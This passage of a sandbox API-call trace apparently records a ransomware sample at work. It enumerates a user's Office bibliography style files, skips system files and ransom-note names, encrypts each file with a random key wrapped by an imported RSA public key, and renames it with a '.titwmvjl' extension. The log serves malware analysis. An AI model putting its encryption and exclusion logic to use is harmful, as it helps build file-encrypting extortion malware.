param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock") returned 91 [0070.634] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0070.635] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.635] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.635] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned 67 [0070.635] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0070.635] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5033b8 [0070.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.636] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.636] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.636] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.636] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".") returned 1 [0070.636] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="..") returned 1 [0070.636] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="APASixthEditionOfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" [0070.636] lstrlenW (lpString=".titwmvjl") returned 9 [0070.636] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0070.636] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.636] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.titwmvjl") returned 107 [0070.636] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0070.636] lstrlenW (lpString=".xsl") returned 4 [0070.636] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.636] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xsl ") returned 5 [0070.636] lstrcmpiW (lpString1=".xsl", lpString2=".titwmvjl") returned 1 [0070.636] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0070.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="desktop.ini") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="autorun.inf") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="iconcache.db") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="bootsect.bak") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="boot.ini") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.html") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ntldr") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0070.637] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="Bootfont.bin") returned -1 [0070.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0070.637] lstrlenW (lpString=".xsl") returned 4 [0070.637] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.637] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xsl ") returned 5 [0070.637] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.638] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.638] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0070.638] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.638] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0070.650] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.650] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.650] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.651] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.651] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.651] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0070.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.651] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.651] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.652] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.652] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.652] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.652] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.653] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.653] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0070.653] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.653] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.653] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.653] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.653] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.654] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503438) returned 1 [0070.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.655] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.655] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.655] GetLastError () returned 0x0 [0070.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.656] CryptDestroyKey (hKey=0x503438) returned 1 [0070.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.656] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.656] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.657] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503638) returned 1 [0070.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.657] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.657] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.658] GetLastError () returned 0x0 [0070.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.658] CryptDestroyKey (hKey=0x503638) returned 1 [0070.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.658] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.658] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.659] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.659] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x51722, lpOverlapped=0x0) returned 1 [0070.689] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffae8de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.689] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x51722, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x51722, lpOverlapped=0x0) returned 1 [0070.705] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.706] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0070.708] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.712] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.714] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.714] CloseHandle (hObject=0x2cc) returned 1 [0070.721] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0070.721] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.722] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.722] lstrcmpW (lpString1="CHICAGO.XSL", lpString2=".") returned 1 [0070.722] lstrcmpW (lpString1="CHICAGO.XSL", lpString2="..") returned 1 [0070.722] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="CHICAGO.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" [0070.722] lstrlenW (lpString=".titwmvjl") returned 9 [0070.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0070.722] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.722] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.titwmvjl") returned 87 [0070.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0070.722] lstrlenW (lpString=".XSL") returned 4 [0070.722] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.723] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0070.723] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0070.723] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0070.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="desktop.ini") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="autorun.inf") returned 1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntuser.dat") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="iconcache.db") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="bootsect.bak") returned 1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="boot.ini") returned 1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntuser.dat.log") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="thumbs.db") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="CRAB-DECRYPT.html") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="CRAB-DECRYPT.txt") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ntldr") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="NTDETECT.COM") returned -1 [0070.723] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="Bootfont.bin") returned 1 [0070.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0070.724] lstrlenW (lpString=".XSL") returned 4 [0070.724] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.724] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0070.724] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.724] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.724] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0070.725] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.725] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0070.738] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.738] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.739] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.739] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.739] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.740] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.740] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0070.740] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.740] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.740] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.740] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.740] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0070.741] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.741] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.741] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.741] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0070.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.742] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.742] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.742] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.743] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503538) returned 1 [0070.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.743] CryptGetKeyParam (in: hKey=0x503538, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.744] CryptEncrypt (in: hKey=0x503538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.744] GetLastError () returned 0x0 [0070.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.744] CryptDestroyKey (hKey=0x503538) returned 1 [0070.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.745] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.745] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0070.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.746] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034b8) returned 1 [0070.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.746] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0070.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.746] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0070.747] GetLastError () returned 0x0 [0070.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.747] CryptDestroyKey (hKey=0x5034b8) returned 1 [0070.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.747] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.747] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.747] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.747] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x48839, lpOverlapped=0x0) returned 1 [0070.780] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffb77c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.780] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x48839, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x48839, lpOverlapped=0x0) returned 1 [0070.807] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.807] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0070.811] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.816] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.817] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.817] CloseHandle (hObject=0x2cc) returned 1 [0070.836] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.titwmvjl" (normalized: 